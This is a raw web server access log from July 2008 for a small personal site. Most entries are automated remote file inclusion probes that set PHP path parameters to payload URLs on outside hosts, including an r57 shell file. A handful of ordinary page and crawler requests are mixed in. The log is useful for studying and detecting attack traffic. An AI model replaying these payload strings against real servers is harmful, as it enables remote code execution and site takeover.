74.53.240.146 - - [31/Jul/2008:02:00:53 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
74.53.240.146 - - [31/Jul/2008:02:00:53 -0500] "GET //config/dbutil.bck.php?confdir=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
222.122.52.79 - - [31/Jul/2008:02:01:32 -0500] "GET /logs/access_log.1213142400//Neos_Chronos/header.php?base_folder=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
89.111.179.12 - - [31/Jul/2008:02:01:51 -0500] "GET /logs/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 93415 "-""libwww-perl/5.805"
89.111.179.12 - - [31/Jul/2008:02:01:52 -0500] "GET /?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
80.74.146.175 - - [31/Jul/2008:02:03:26 -0500] "GET /?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
80.74.146.175 - - [31/Jul/2008:02:03:27 -0500] "GET /logs/?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 200 93415 "-""libwww-perl/5.805"
74.53.240.146 - - [31/Jul/2008:02:04:04 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
74.53.240.146 - - [31/Jul/2008:02:04:05 -0500] "GET //config/dbutil.bck.php?confdir=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
203.130.242.135 - - [31/Jul/2008:02:04:10 -0500] "GET /logs/administrator\\components\\com_dbquery\\classes\\DBQ\\admin\\common.class.phphttp://www.apnic.net/index.html? HTTP/1.0" 404 379 "-""Mozilla/5.0"
203.130.242.135 - - [31/Jul/2008:02:04:11 -0500] "GET /administrator\\components\\com_dbquery\\classes\\DBQ\\admin\\common.class.phphttp://www.apnic.net/index.html? HTTP/1.0" 404 374 "-""Mozilla/5.0"
74.53.240.146 - - [31/Jul/2008:02:05:03 -0500] "GET /logs///poll/png.php?include_path=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
74.53.240.146 - - [31/Jul/2008:02:05:03 -0500] "GET ///poll/png.php?include_path=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
59.106.19.213 - - [31/Jul/2008:02:05:17 -0500] "GET /?sourcedir=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
59.106.19.213 - - [31/Jul/2008:02:05:19 -0500] "GET /logs/?sourcedir=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 200 93415 "-""libwww-perl/5.805"
148.231.51.121 - - [31/Jul/2008:02:05:35 -0500] "GET /logs/login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.0" 404 286 "-""libwww-perl/5.803"
148.231.51.121 - - [31/Jul/2008:02:05:35 -0500] "GET /login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.0" 404 281 "-""libwww-perl/5.803"
148.231.51.121 - - [31/Jul/2008:02:05:35 -0500] "GET /logs/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.0" 404 301 "-""libwww-perl/5.803"
148.231.51.121 - - [31/Jul/2008:02:05:36 -0500] "GET /pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.0" 404 296 "-""libwww-perl/5.803"
148.231.51.121 - - [31/Jul/2008:02:05:39 -0500] "GET /logs/shared_functions.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.0" 404 297 "-""libwww-perl/5.803"
148.231.51.121 - - [31/Jul/2008:02:05:39 -0500] "GET /shared_functions.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.0" 404 292 "-""libwww-perl/5.803"
148.231.51.121 - - [31/Jul/2008:02:06:09 -0500] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.0" 404 309 "-""libwww-perl/5.803"
148.231.51.121 - - [31/Jul/2008:02:06:10 -0500] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.0" 404 304 "-""libwww-perl/5.803"
74.53.240.146 - - [31/Jul/2008:02:06:16 -0500] "GET /logs///poll/png.php?include_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
74.53.240.146 - - [31/Jul/2008:02:06:16 -0500] "GET ///poll/png.php?include_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
194.24.180.40 - - [31/Jul/2008:02:06:22 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.69"
194.24.180.40 - - [31/Jul/2008:02:06:22 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.69"
148.202.29.8 - - [31/Jul/2008:02:07:08 -0500] "GET /header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
69.93.189.130 - - [31/Jul/2008:02:07:21 -0500] "GET /?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
69.93.189.130 - - [31/Jul/2008:02:07:21 -0500] "GET /logs/?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 200 93415 "-""libwww-perl/5.810"
148.231.51.121 - - [31/Jul/2008:02:08:00 -0500] "GET /logs//include.php?path[docroot]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.0" 404 289 "-""libwww-perl/5.803"
148.231.51.121 - - [31/Jul/2008:02:08:01 -0500] "GET //include.php?path[docroot]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.0" 404 284 "-""libwww-perl/5.803"
194.24.180.40 - - [31/Jul/2008:02:09:21 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.69"
194.24.180.40 - - [31/Jul/2008:02:09:21 -0500] "GET /?DOCUMENT_ROOT=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.69"
74.53.240.146 - - [31/Jul/2008:02:09:58 -0500] "GET /logs///poll/png.php?include_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
74.53.240.146 - - [31/Jul/2008:02:09:59 -0500] "GET ///poll/png.php?include_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
80.67.26.157 - - [31/Jul/2008:02:10:01 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:02:10:02 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
88.84.151.157 - - [31/Jul/2008:02:10:29 -0500] "GET /logs//toolbar.php?dirDepth=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
88.84.151.157 - - [31/Jul/2008:02:10:29 -0500] "GET //toolbar.php?dirDepth=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
80.74.146.175 - - [31/Jul/2008:02:10:55 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
80.74.146.175 - - [31/Jul/2008:02:10:55 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
74.53.240.146 - - [31/Jul/2008:02:11:20 -0500] "GET //?include_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
74.53.240.146 - - [31/Jul/2008:02:11:21 -0500] "GET /logs//?include_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 200 93420 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
195.93.201.102 - - [31/Jul/2008:02:11:24 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:02:11:24 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
74.53.240.146 - - [31/Jul/2008:02:13:19 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
74.53.240.146 - - [31/Jul/2008:02:13:19 -0500] "GET //config/dbutil.bck.php?confdir=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
201.130.79.130 - - [31/Jul/2008:02:14:02 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:02:14:06 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:02:14:06 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
70.84.182.98 - - [31/Jul/2008:02:14:26 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
201.130.79.130 - - [31/Jul/2008:02:14:37 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:02:14:37 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
70.84.182.98 - - [31/Jul/2008:02:14:40 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:02:15:50 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:02:15:51 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:02:15:54 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:02:15:55 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:02:16:13 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:02:16:13 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:02:16:31 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:02:16:32 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
148.231.51.121 - - [31/Jul/2008:02:16:48 -0500] "GET /logs//postscript/postscript.php?p_mode=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.0" 404 303 "-""libwww-perl/5.803"
148.231.51.121 - - [31/Jul/2008:02:16:51 -0500] "GET //postscript/postscript.php?p_mode=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.0" 404 298 "-""libwww-perl/5.803"
74.6.18.231 - - [31/Jul/2008:02:17:06 -0500] "GET /logs/access_log.1212364800 HTTP/1.0" 200 518223 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.95.229.220 - - [31/Jul/2008:02:17:16 -0500] "GET /logs/header.php?prefix=http://h-pro.ru/lang/inc? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.95.229.220 - - [31/Jul/2008:02:17:16 -0500] "GET /header.php?prefix=http://h-pro.ru/lang/inc? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.53.240.146 - - [31/Jul/2008:02:17:28 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
74.53.240.146 - - [31/Jul/2008:02:17:28 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
80.67.26.157 - - [31/Jul/2008:02:17:31 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:02:17:31 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:02:17:31 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
63.246.128.120 - - [31/Jul/2008:02:19:08 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
63.246.128.120 - - [31/Jul/2008:02:19:08 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.111.179.12 - - [31/Jul/2008:02:19:09 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.111.179.12 - - [31/Jul/2008:02:19:09 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:02:19:41 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:02:19:41 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:02:19:41 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
74.53.240.146 - - [31/Jul/2008:02:19:43 -0500] "GET /logs///poll/png.php?include_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
74.53.240.146 - - [31/Jul/2008:02:19:43 -0500] "GET ///poll/png.php?include_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.44.234.103 - - [31/Jul/2008:02:20:07 -0500] "GET /logs//include.php?path[docroot]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:20:07 -0500] "GET //include.php?path[docroot]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.811"
148.202.29.8 - - [31/Jul/2008:02:20:11 -0500] "GET /logs/access_log.1212883200/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
148.202.29.8 - - [31/Jul/2008:02:20:13 -0500] "GET /header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
148.202.29.8 - - [31/Jul/2008:02:20:13 -0500] "GET /logs/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
195.95.229.220 - - [31/Jul/2008:02:22:02 -0500] "GET /header.php?prefix=http://h-pro.ru/lang/inc? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
86.21.186.26 - - [31/Jul/2008:02:25:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://search.msn.co.uk/results.aspx?q=Vintage+Tattoos&FORM=QSRE2""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)"
86.21.186.26 - - [31/Jul/2008:02:25:36 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)"
86.21.186.26 - - [31/Jul/2008:02:25:36 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)"
86.21.186.26 - - [31/Jul/2008:02:25:38 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)"
203.130.242.135 - - [31/Jul/2008:02:26:37 -0500] "GET /logs/administrator\\components\\com_dbquery\\classes\\DBQ\\admin\\common.class.phphttp://www.apnic.net/index.html? HTTP/1.0" 404 379 "-""Mozilla/5.0"
211.93.112.42 - - [31/Jul/2008:02:27:52 -0500] "GET /logs/access_log.1212883200//index.php?_SERVER[DOCUMENT_ROOT]=http://www.kelserific4.xpg.com.br/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.93.112.42 - - [31/Jul/2008:02:27:53 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.kelserific4.xpg.com.br/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.93.112.42 - - [31/Jul/2008:02:27:54 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.kelserific4.xpg.com.br/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
74.6.18.231 - - [31/Jul/2008:02:28:27 -0500] "GET /logs/access_log.1196467200 HTTP/1.0" 200 198259 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.95.229.220 - - [31/Jul/2008:02:28:40 -0500] "GET /logs/access_log.1212883200/header.php?prefix=http://h-pro.ru/lang/inc? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.95.229.220 - - [31/Jul/2008:02:28:40 -0500] "GET /header.php?prefix=http://h-pro.ru/lang/inc? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.95.229.220 - - [31/Jul/2008:02:28:41 -0500] "GET /logs/header.php?prefix=http://h-pro.ru/lang/inc? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.152.41.170 - - [31/Jul/2008:02:30:06 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
62.152.41.170 - - [31/Jul/2008:02:30:06 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
203.22.204.92 - - [31/Jul/2008:02:31:09 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.76"
80.67.26.157 - - [31/Jul/2008:02:31:11 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:02:31:12 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
195.93.201.102 - - [31/Jul/2008:02:31:18 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:02:31:18 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.84.151.157 - - [31/Jul/2008:02:31:57 -0500] "GET /logs/access_log.1214438400//toolbar.php?dirDepth=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
88.84.151.157 - - [31/Jul/2008:02:31:57 -0500] "GET //toolbar.php?dirDepth=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
88.84.151.157 - - [31/Jul/2008:02:31:57 -0500] "GET /logs//toolbar.php?dirDepth=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
207.44.234.103 - - [31/Jul/2008:02:34:14 -0500] "GET /logs/access_log.1214438400/shared_functions.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:34:14 -0500] "GET /shared_functions.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:34:14 -0500] "GET /logs/shared_functions.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:34:15 -0500] "GET /logs/access_log.1214438400/login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:34:15 -0500] "GET /login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:34:15 -0500] "GET /logs/access_log.1214438400/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:34:15 -0500] "GET /logs/login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:34:15 -0500] "GET /pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:02:34:15 -0500] "GET /logs/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
137.122.93.191 - - [31/Jul/2008:02:35:54 -0500] "GET /artwork/invisible1.jpg HTTP/1.1" 200 35563 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.01"
63.246.128.120 - - [31/Jul/2008:02:37:09 -0500] "GET /logs/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 93415 "-""libwww-perl/5.805"
63.246.128.120 - - [31/Jul/2008:02:37:09 -0500] "GET /?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
62.152.41.170 - - [31/Jul/2008:02:37:30 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
62.152.41.170 - - [31/Jul/2008:02:37:30 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
89.111.179.12 - - [31/Jul/2008:02:38:16 -0500] "GET /logs/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 93415 "-""libwww-perl/5.805"
89.111.179.12 - - [31/Jul/2008:02:38:17 -0500] "GET /?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.111.173.117 - - [31/Jul/2008:02:41:34 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
89.111.173.117 - - [31/Jul/2008:02:41:34 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:02:41:37 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
